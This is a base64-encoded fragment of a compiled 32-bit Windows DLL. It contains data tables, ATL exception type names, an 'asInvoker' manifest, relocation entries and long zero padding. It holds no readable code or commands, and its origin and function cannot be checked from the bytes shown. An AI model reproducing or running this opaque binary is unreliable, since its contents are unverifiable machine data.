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ABIAAAAPjCUMfsxOzJ7Mqoy4jIKMzozajPLMws0QjRdNGc0cTR+NIM0iTSNNJI0mDSlNKo0tDTBNMU0yjTUNN406TTtNAAAAQDwAAAAjDGQMZQxoDGkMagxrDG4Mbwx/DEAMggyDDIQMhQyGDJIOUw5UDlUOVg5XDlgOWQ5aDlsOXA5dDl4OXw5gDmEOYg5jDmQOZQ5mDmcOaA5pDmoOaw5sDm0Obg5vDnAOcQ5yDnMOdA51DnYOdw54DnkOeg57DnwOfQ5+Dn8OQA6BDoIOgw6EDoUOhg6HDogOiQ6KDosOjA6NDo4Ojw6QDpEOkg6TDpQOlQ6WDpcOmA6ZDpoOmw6cDp0Ong6fDqAOoQ6iDqMOpA6lDqYOpw6oDqkOqg6rDqwOrQ6uDq8OsA6xDrMOtA61DoAAAAQAQAgAAAAsDu0O7g7vDvAO8Q7yDvMO9A71DvYOwAAACABAGQAAADQPNQ82DzcPCw9MD2oPaw9vD3APcg94D3wPfQ9BD4IPgw+FD4sPjA+SD5YPlw+cD50PoQ+iD6YPpw+oD6oPsA+PD9AP2A/gD+IP5A/mD+cP6Q/uD/AP9Q/8D8AAAAwAQC8AAAAEDAwMFAwXDB4MIQwoDC8MMAw4DD8MAAxIDFAMWAxgDGgMcAx3DHgMfwxADIcMiAyQDJcMmAygDKgMsAy4DLsMggzKDNIM2QzaDNwM4wznDOkM7Az0DPcM/wzCDQoNDQ0VDRcNGg0iDSUNLQ0wDTgNOw0DDUUNRw1JDUwNVA1XDV8NYQ1kDXINdA11DXsNfA1ADYkNjA2ODZoNnA2dDaMNpA2rDawNrg2wDbINsw21DboNgAAAFABAPwAAAAAMAQwoDGwMbQx0DEYNhA3eDeIN5g3qDe4N9w36DfsN/A39Df4NwA4BDgQOJA5lDmYOaA5pDmoOaw5sDm0Obg5vDnAOcQ5yDnMOdA51DnYOdw54DnkOeg57DnwOfQ5+Dn8OQA6BDoIOgw6EDoUOhg6HDogOiQ6KDosOjA6NDo4Ojw6QDpEOkg6WDpgOmQ6aDpsOnA6dDp4Onw6gDqEOpA6oDqoOiA9JD0oPSw9MD00PTg9PD1APUQ9SD1MPVQ9XD1kPWw9dD18PYQ9jD2UPZw9pD2sPbQ9vD3EPcw91D3cPeQ97D30Pfw9BD6wPrQ+YD+AP4Q/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA